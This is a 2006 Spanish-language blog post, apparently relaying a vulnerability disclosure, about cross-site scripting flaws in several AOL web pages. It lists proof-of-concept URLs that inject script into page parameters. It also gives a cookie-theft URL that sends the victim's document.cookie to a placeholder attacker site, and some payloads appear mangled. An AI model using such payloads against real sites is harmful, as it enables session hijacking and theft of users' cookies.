ecoestadistica.com

domingo, enero 08, 2006

AOL Multiple XSS Vuln

Vulnerabilidad: Cross Site Scripting / Cookie-Theft / Relogin attacks

Severidad: Media/Alta

Probado en: Microsoft IE 6.0 y FireFox 1.5

Detalles:

Los motores de búsqueda de AOL.com se crean con AOLserver Dynamic Pages (o ADP). ADP es un conjunto de extensiones del servidor web para diseñar dinámicamente documentos. Utilizando AOLserver , ADP vuelve un documento al usuario basado en correr un conjunto de códigos de Tcl con argumentos proporcionados por el usuario. Esto es basado en Páginas Activas del servidor de Microsoft.

Prueba de Concepto:

http://peopleconnection.aol.com/dirmodule.adp?_did=55004"><>alert('VULNERABLE')&_dtype=csv&amp;_dcookie= 1&_dpath=pc_main,pc_main&_dsect=1#

http://health.aol.com/dirmodule.adp?_did=41623"><>alert('VULNERABLE')&_dtype=csv&amp;_dcookie=0&_dpath=
hlth_talk,hlth_talk&_dsect=1&dirHeader= Health%20Talk%20Directory

http://health.aol.com/dirmodule.adp?_did=41623">&_dtype=csv&_dcookie=0&_dpath=
hlth_talk,hlth_talk&_dsect= 1&dirHeader=Health%20Talk%20Directory#

http://aimtoday.aol.com/features/main_redesign.adp?fid=acct_linking"><> alert ('VULNERABLE') < / script >

http://aolexpressions.aol.com/main.adp?expTypeId=1"><>alert('VULNERABLE')< /script >&clientId=2

http://aolexpressions.aol.com/search.adp?clientId=2&search=<>alert ('VULNERABLE')< / script >

http://food.aol.com/food/recipefinder.dyn?action=howItWorks"><>alert('VULNERABLE')< / script >

Ejemplo de Robo de Cookie :

http://aolexpressions.aol.com/search.adp?clientId=2&search=<>document.location='http://www.some-attacker-site/grab.php?cookie='+escape (document.cookie).substr(0,1900)

Fuente:fr33d0m.net

Salu2



0 Comments:

Publicar un comentario

Links to this post:

Crear un vínculo

<< Home

ecoestadistica.com